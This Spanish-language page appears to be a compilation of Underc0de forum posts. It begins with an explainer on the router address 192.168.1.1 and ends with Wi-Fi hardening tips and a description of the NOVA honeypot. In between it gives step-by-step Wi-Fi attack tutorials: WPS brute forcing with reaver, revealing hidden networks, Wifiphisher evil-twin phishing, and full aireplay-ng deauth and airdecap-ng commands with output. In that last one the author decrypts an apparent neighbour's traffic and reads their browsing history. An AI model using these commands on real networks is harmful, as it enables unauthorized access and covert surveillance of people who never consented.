Dónde queda 192.168.1.1?

192.168.1.1 es una dirección IP usada por muchas empresas fabricantes de routers para acceder a la configuración.


No existe ninguna duda que como usuario de Internet has escuchado sobre el término “dirección de IP”, sin embargo, si no eres un amante de la tecnología probablemente no sabrás qué significa esto con exactitud. La dirección IP está diseñada para que un dispositivo pueda comunicarse con otro a través del Internet. Todo dispositivo, así sea un ordenador, tablet o móvil, que se conecte a la web necesita una dirección IP, la cual ayudará a que cada uno se diferencie de los demás y que se le establezca una ubicación en el mundo.

Una buena analogía para entender qué es una IP es compararla con la dirección física de tu casa. Para que alguien pueda enviarte un paquete, necesitarán esa dirección. Lo mismo sucede cuando un ordenador remoto necesita comunicarse contigo, pero en este caso necesitará la dirección IP.

info

Algo que tienen en común ambas direcciones, es que muestran en qué parte del mundo estás y es por esto que algunos usuarios de Internet usan servicios de VPN para esconder su IP original. De esta manera nadie podrá saber desde dónde te estás conectando realmente, aumentando así la seguridad de la navegación.

Las IPs consisten en cuatro números separados por un punto y cada uno de ellos contiene entre uno y tres dígitos. Cada número puede comenzar en el cero y terminar en el 255. Por ejemplo: 78.125.0.255, o quizás 192.168.1.1.


192.168.1.1

Ya que sabemos qué es una dirección IP, entonces podemos hablar sobre 192.168.1.1. Esta IP en particular es una dirección privada que se usa para entrar en la configuración de la mayoría de los routers que están disponibles en el mercado. Marcas como Netgear y Linksys usan esta dirección IP para que puedas entrar a configurar los routers que ellos han fabricado, lo que hace que el usuario tenga la facilidad de aprenderse esta dirección para tenerla a la mano cuando la necesite en su propia red o en la de algún amigo o familiar.

direccion

The Be Box – Ports

Ya que los routers tienen 192.168.1.1 como dirección, todos los dispositivos que se conecten a esta red tendrán IPs similares: 192.168.1.2, 192.168.1.3 y así sucesivamente. Pero, hay que tener claro que estas IPs son privadas y sirven solo para identificar a un dispositivo dentro de una red local, también conocida como LAN.

Dónde queda 192.168.1.1?


¿Para qué se usa específicamente el 192.168.1.1?


Como dijimos, es una manera de configurar el router. Básicamente, tienes que escribir esta dirección en el navegador y aparecerá una página nueva donde podrás cambiar algunas funciones de tu enrutador. En la mayoría de los casos se te pedirá antes un nombre de usuario y una contraseña para poder entrar, pero si es la primera vez, la información estará en el manual. En otros casos no necesitarás nada adicional para entrar en la configuración, pero esto es un problema de seguridad con el que hay que lidiar.

Entrando a la configuración de tu router puedes cambiar el nombre de la red WiFi, crear una red invitada, detectar qué equipos se conectan a la red, cambiar la contraseña de acceso, cambiar los DNS, añadir controles parentales, y reiniciar el aparato cuando la conexión tiene fallos, solo por nombrar apenas algunas cosas.

internet

Hay que tener claro que no todos los routers usan esta dirección para entrar en su configuración. Esto no es una regla, solo es algo convencional, así que ha sido usado con frecuencia por los fabricantes de este tipo de dispositivos. Puedes averiguar cuál es la dirección para tu router revisando el manual o mirando en la parte de abajo del dispositivo.

¿Necesitas hackear redes WPA/WPA-PSK?


Hola  amigos y lectores, les vengo a explicar como crackear redes WPA-WPA-PSK (Pre Shared Key), 

Comencemos.  Algunos se preguntarán, ¿qué es REAVER?

Reaver es una herramienta de fuerza bruta para redes WPS (Wi-Fi Protected Setup).

En primer lugar, lo que hacemos es encender nuestra tarjeta de red en modo de seguimiento, por lo que abrirá el terminal  (yo uso Linux Kali). Eso sería colocar:

Airmon-ng wlan0     (enter)

Para iniciar la tarjeta de red en modo monitor: 




Ahora, como podemos ver en la imagen, hemos puesto nuestra tarjeta de red en modo monitor, en este caso sería el mon0.  


Paso siguiente utilizaremos la herramienta llamada wifite.

Wifite es una herramienta programada en Python echa básicamente para encontrar redes cercanas a cualquier zona Wi-Fi. 

Lo siguiente, es  abrir otra pestaña, y colocamos wifite y damos enter.


Como se puede ver en la imagen anterior, escaneamos 2 redes WPS (WiFi Protected Setup)

- PIPE

- Movistar


Pero por ahora voy a elegir la red Wi-Fi y PIPE (XD) ya qué es la mía, y ahora sabemos que es vulnerable a los ataques Reaver por que es una red WPS.

Ahora tendremos que averiguar el BSSID (Basic Service Set Identificer) para iniciar el escaneo de fuerza bruta. Sabed que   el escaneo se demorará entre 16 a 19 horas, aproximadamente.

Funciona o solo sirve para redes WPA-PSK (Pre Shared Key), red pre-compartida o una red solo en casa, 

Algunos se preguntarán:

¿Qué es BSSID 
(Basic Service Set Identificer)?

BSSID 
(Basic Service Set Identificer) es un nombre de identificación del área local (LAN) inalámbrica de todos los paquetes. MAC ( Media Access Control) formado por 48 bits, del punto de acceso inalámbrico.

 A continuación, colocaremos en otra pestaña o terminal airodump-ng mon0 y le daremos enter.


Como observar  en la imagen, podemos ver la red BBSID  de las redes Wi-Fi. Ahora que sacamos la BBSID podemos comenzar a usar el Reaver para empezar a emplear fuerza bruta a la red Wi-Fi.  Esta herramienta no necesita utilizar ningún diccionario WPA-PSK antes WPA/WPA2 PSK. Recuerden   que se trata de "una red pre-compartida o solo en casa". La brute force  se utiliza más para la recuperación de la contraseña  en casos de olvido, también. 

Así que  sigamos, ahora vamos a abrir otra terminal o pestaña y escribimos lo siguiente en el terminal:

reaver-i mon0-b F8: C3: 46:37:75:7 F-vv

Le daremos enter y nos aparecerá lo siguiente:


Como pueden ver en la imagen, cuando ejecutamos el comando nos comenzara analizar y trabajar sola, pero recuerden tener paciencia, ya que como escribí antes esto puede ser un proceso de hasta 16 horas o máximo 19.
No coloco la otra imagen ya con la contraseña y el PIN , por una cuestión de  precaución.
Espero que hayan entendido!

Por dudas, consultas o preguntas: AQUÍ.

Visítanos en Underc0de


¿Redes ocultas? Averigua cómo ver el nombre




En este mini tutorial, les voy a enseñar a ver los nombres de las redes ocultas, que siempre es necesario saberlo tanto como para romper su password, como para conectarse.

Lo primero que debemos hacer, es poner nuestra interface en modo monitor. Comentaré brevemente este proceso, ya que lo he explicado varias veces en tutoriales previos.

1.- Identificamos el nombre de nuestra interface:


2.- La colocamos en modo monitor:


Lo mas probable, es que una vez hecho esto, su interface en modo monitor pase a llamarse mon0. En mi caso se llama wlan1, asique solo reemplacen el wlan1 por mon0 y listo.

El paso siguiente, es scannear y ver que redes hay disponibles. Para ellos utilizaremos el siguiente comando:


Y veremos algo como esto:


Como se ve en la captura, hay una red marcada en rojo llamada <length:    0>. Esta es nuestra red oculta. A su vez, con amarillo está resaltada su BSSID (MAC del Router). 

Por otro lado, en la parte inferior, este BSSID vuelve a aparecer, y a su derecha aparece un STATION. Esto quiere decir, que hay un cliente conectado a ese router.

Cabe resaltar que para poder obtener el nombre de la red, debe haber alguien conectado. De lo contrario no se podrá.

Detenemos el scanneo presionando CTRL + C y colocamos el siguiente comando:


El parámetro del -c es el numero del canal. En este caso esta red está en el canal 1. Y en --bssid va la MAC del router.

Lo que hará esto, será escuchar solo a esa red incógnita.



Ahora en otra consola, pondremos lo siguiente:


Este comando es el que se suele utilizar para sacar las claves WPA. En el parámetro -a pondremos la MAC del router y en el parámetro -C pondremos la MAC del cliente conectado.

Una vez hecho esto, aparecerá el nombre de la red oculta:


Espero que les sirva!

Saludos!
ANTRAX

Puedes ver más aquí

Visítanos en Underc0de

WIFIPHISHER: Tool de ataque contra redes Wi-Fi, bajo Kali Linux


Hola lectores y amigos  Hablemos de Wifiphisher! 


Señalada como herramienta de seguridad que realiza ataques phishing, rápidos y automatizados  contra redes seguras de Wi-Fi. El objetivo es obtener  credenciales de portales cautivos  o contraseñas de la víctima, mediante la técnica ‘Evil Twin’  en estrecha combinación con la ingeniería social, y a diferencia de otros métodos, no incluye fuerza bruta alguna.



En palabras de su desarrollador George Chatzisofroniou: “It's a social engineering attack that does not use brute forcing in contrast to other methods. It's an easy way to get WPA passwords"


WiFiPhisher, crea un falso punto de acceso enmascarando al legítimo y dirige un ataque de denegación de servicio (DoS) contra el AP auténtico con el fin que los usuarios se desconecten. Cuando la víctima intenta reconectar, wifiphisher responderá con un AP falso, que solicita confirmar  la pass simulando una actualización del firmware del router.


La herramienta que trabaja bajo Kali Linux está disponible en: 

Github


Fuente y mayor desarrollo en: thehackernews.com (en inglés).

PD: La traducción no es literal. 

Te interesan estos temas? Visítanos en Underc0de 



Capturando el tráfico de una red WiFi como un ninja


Una de las cosas que más nos debería preocupar cuando tenemos a un intruso en nuestra red de confianza (Red local de casa, del trabajo, etc.) es que capture el tráfico y lo analice, de forma que pueda controlar lo que estamos haciendo.

Una vez invadida una red WiFi podríamos intentar capturar tráfico con tcpdump, pero no tendríamos los resultados esperados. Una buena forma de hacerlo sería redirigir todo el tráfico de la red a nuestro equipo para poder analizarlo, pero ésto podría disparar varias alarmas.

The quieter you become, the more you are able to hear
El lema de BackTrack es lo que nos trae a buscar procedimientos más silenciosos, así que... ¿Cómo podemos capturar el tráfico de la red sin llamar la atención?

La respuesta es, como siempre: DEPENDE

Muchos hackers dan una respuesta muy tajante con respecto a la seguridad y el WiFi: No lo uses, usa cable. Pero ¿por qué son tan tajantes?



Algunos se amparan en la lógica de la velocidad de red. Está muy bien que con las redes WiFi N alcances 150Mbps, o que los 450Mbps con wifi a 5GHz, pero sigue siendo menos que la mitad que las redes Gigabit. Coherente, lógico y correcto. En eso es mejor el cable que el WiFi. ¿Pero qué más?

Seguridad. Utilizar WiFi es jugar con fuego bajo determinadas circunstancias, ya que el tráfico de la red se puede capturar sin estar conectado a la red (Cualquiera que sepa levantar claves WEP habrá capturado muchísimo tráfico antes de conocer la contraseña)

Una vez sabida la contraseña podríamos intentar descifrar todo el tráfico capturado para su posterior análisis en Ethereal. Pero en las redes WPA no es tan sencillo. Es muy fácil, pero no tanto.

¿Cómo se crackea una clave WPA?

No lo voy a explicar aquí en detalle, éso debéis estudiarlo en otros posts. Necesitamos llegar aquí sabiendo que necesitamos capturar el handshake de un cliente autenticado para hacerle un ataque por diccionario, hasta que el archivo se descifra correctamente y obtenemos el positivo.

Por esa regla de tres podemos deducir que si tenemos el handshake y la contraseña podemos descifrar los paquetes capturados para analizarlos después. Y para eso no necesitamos estar conectados a la red, sólo tener nuestra antena WiFi a la escucha.

El otro día estuve jugando con ataques de fuerza bruta contra WPS con un resultado fructífero. Usaré ese AP a modo de dummy. (Nota: Los posibles datos identificativos han sido editados)

Código: Text
  1. root@kali:/home/rand0m/neighbor# airodump-ng -w ahorateveo --bssid D8:61:FF:FF:FF:FF --essid VodafoneFFFF --channel  7 --output-format pcap -a wlan0mon

Lanzamos airodump-ng con los parámetros bssid y essid para filtrar sólo el tráfico de la red que nos interesa. Además le decimos que nos guarde el archivo ahorateveo en formato pcap.

Código: Text
  1.  CH  7 ][ Elapsed: 0 s ][ 2015-08-18 22:07
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

De primeras tenemos nuestra antena a la escucha y filtrando los paquetes de la red que queremos. Ahora necesitamos el handshake, así que lanzamos el ataque DEAUTH con aireplay-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# aireplay-ng -0 0 -a D8:61:FF:FF:FF:FF wlan0mon
  2. 22:10:30  Waiting for beacon frame (BSSID: D8:61:FF:FF:FF:FF) on channel 7
  3. NB: this attack is more effective when targeting
  4. a connected wireless client (-c <client's mac>).
  5. 22:10:31  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  6. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  7. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  8. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  9. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  10. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  11. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  12. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  13. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  14. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]

Hasta que conseguimos lo que queríamos: El WPA handshake.

Código: Text
  1.  CH  7 ][ Elapsed: 5 mins ][ 2015-08-18 22:12 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -74    1e- 6      0     4019  VodafoneFFFF

Ahora lo dejamos a la escucha y nos olvidamos. Vamos a dejarlo capturando unas horas y luego veremos qué nos encontramos.

Cuando tenemos un buen pino ya podemos ponernos a estudiar los datos recopilados.

Código: Text
  1.  CH  7 ] 9 hours 55 mins ][ 2015-08-19 08:02 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -82  96   298434    99355    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -75    1e- 6      0     1365  VodafoneFFFF

Ahora, para descifrarlo, usaremos la herramienta airdecap-ng, que viene con la suite de aircrack-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# airdecap-ng -e VodafoneFFFF -b D8:61:FF:FF:FF:FF -p Underc0de ahorateveo-01.cap
  2. Total number of packets read       2532614
  3. Total number of WEP data packets         0
  4. Total number of WPA data packets     93405
  5. Number of plaintext data packets         0
  6. Number of decrypted WEP  packets         0
  7. Number of corrupted WEP  packets         0
  8. Number of decrypted WPA  packets     79414

Esto nos generará el archivo ahorateveo-01-dec.cap con los paquetes descifrados. Ya sólo nos queda abrirlo en Wireshark para poder analizar los datos recopilados.

Por ejemplo, viendo las consultas DNS realizadas podemos ver por dónde estuvo navegando.


Y podemos ver que es un chico malo malo que navega por piratebay y por páginas golfas. Lo típico que hace alguien relajándose mientras no hay nadie mirando, pero ¿cuántas veces creemos que no nos observan mientras sí lo hacen?

Además, como hablábamos al principio, los paquetes se capturaron del aire. No estoy conectado a la red, sólo conozco la contraseña.

NO aparezco conectado a su red. NO aparezco enviando tráfico sospechoso. Sólo escucho, descifro y analizo.

Autor: rand0m
Fuente: https://underc0de.org/foro/wireless/capturando-el-trafico-de-una-red-wifi-como-un-ninja

Seguridad en redes Wireless

 
 
Seguridad Wireless
 
La seguridad en redes wireless es un tema importante a tener en cuenta, pues son muchas las personas que dejan por defecto las configuraciones de fábrica y son fácilmente crackeables. "Pues la naturaleza de las redes wireless hace que cualquier persona pueda tener acceso a los datos que son enviados, debido a que estos utilizan como medio de transmisión el aire (ondas electromagnéticas). Esto plantea un problema añadido con respecto al cable. Para tener acceso a los datos transmitidos por cable se ha de tener acceso al mismo o a los dispositivos asociados. Para las redes wireless no es necesario, basta con que la señal viaje hasta nosotros." (información entre comillas de securitybydefault) si alguien se conectara a tu red podría: capturar tus credenciales de sitios web, espiar tu navegación, etc...

Medidas de prevención
 
1- Cambiar el ESSID de la red(El nombre por defecto, ejemplo:"ONO2A4S")
2- Cambiar la clave por defecto por una más segura combinando: mayúsculas, minúsculas, números y símbolos.
3- Deshabilitar el procolo WPS (Wi-Fi Protected Setup)
4- Usar cifrados WPA2 en vez de WEP o WPA.
5- Cuando estés fuera de casa sino lo necesitas apagar el router.
 
Se da por hecho que hoy en día estés usando cifrado WPA/2 en tu red Wireless, ahora el punto que podría definir debilidad o fortaleza en tu red es tu contraseña/clave, para ayudarte a elegir la más apropiada usaremos el sitio web de kurtm.net, el cual nos permite generar una contraseña con una longitud de caracteres personalizado o podemos elegir los 3 niveles que ofrece.


Falsa Seguridad [8 caracteres]

Seguridad Media

Seguridad Maxima

Numero de  caracteres personalizado, en este caso 42

Cabe aclarar que depende del modem o router utilizado admite hasta cierto número de caracteres, ahora si son paranoicos pueden personalizar la contraseña que el sitio web les ofrece, así será única y difícilmente será crackeable.

NOVA (Network Obfuscation and Virtualized Anti-Reconnaissance)


Para los que queráis revisar sobre de que trata el tema de los honeypots, podéis mirar aquí: https://underc0de.org/foro/wireless/montando-un-honeypot/


Aviso: El post plantea una visión panorámica de la tools en base a la documentación que se cita en la fuente. Asumo la responsabilidad de los errores de traducción, no siendo esta literal ni lineal, sino una síntesis. 

¿Qué es NOVA?

NOVA, es una herramienta de código abierto que funciona bajo Linux.  Detecta (y previene) toda clase de reconocimientos a una red,  tanto de un atacante extraño a la misma, como alguien de dentro  (empleados no autorizados) que estén tratando explorar la infraestructura de la red, o incluso malware; por eso altamente eficaz para cooperar en el mantenimiento de la seguridad. 

¿Cómo funciona NOVA?

NOVA, posibilita la creación de múltiples máquinas virtuales en la red a proteger (bajo una versión mejorada de Honeyd) con la apariencia de reales, sirviendo de señuelo al intruso cuando, por ejemplo,  escanea con herramientas  como Nmap o Nessus; pero que en definitiva, cumplen la función de confundir el  objetivo del atacante por medio de los falsos nodos.





Por otra parte, en la detección de actividad, NOVA utiliza algoritmos de 'aprendizaje' automático, activándose las alertas cuando se detecta actividad sospechosa o intentos de penetración  hostil, por lo que no será necesario acudir a la búsqueda manual en los archivos de registro del honeypot. La intrusión  se notifica a los administradores mediante la generación de alarmas al correo o entradas syslog.





Con una interfaz web intuitiva, de sencilla configuración, ofrece la información recogida en los honeypots en una serie de cuadros, gráficos y  tablas de tráfico que muestran los intentos de intrusión, cuyos datos permiten a los administradores de los sistemas de seguridad determinar si existe una amenaza en la red.








En síntesis, se puede destacar:

-Limita los efectos de  ciber ataques internos y externos, detecta actividad sospechosa actuando como IDS, proporciona datos falsos a los atacantes, y alerta a los administradores de red de sucesos críticos.

-Impide a los atacantes hostiles de realizar el reconocimiento sobre redes privadas.

-Mejora el conocimiento de la situación sobre las redes.

- Útil para entrenar y formar equipos de trabajo en la detección de intrusiones a la red.


Github: https://github.com/DataSoft/Nova


Fuentes (en inglés):http: novanetworksecurity.com/
http://www.novanetworksecurity.com/downloads/Nova+User+Manual_Rev1-3.pdf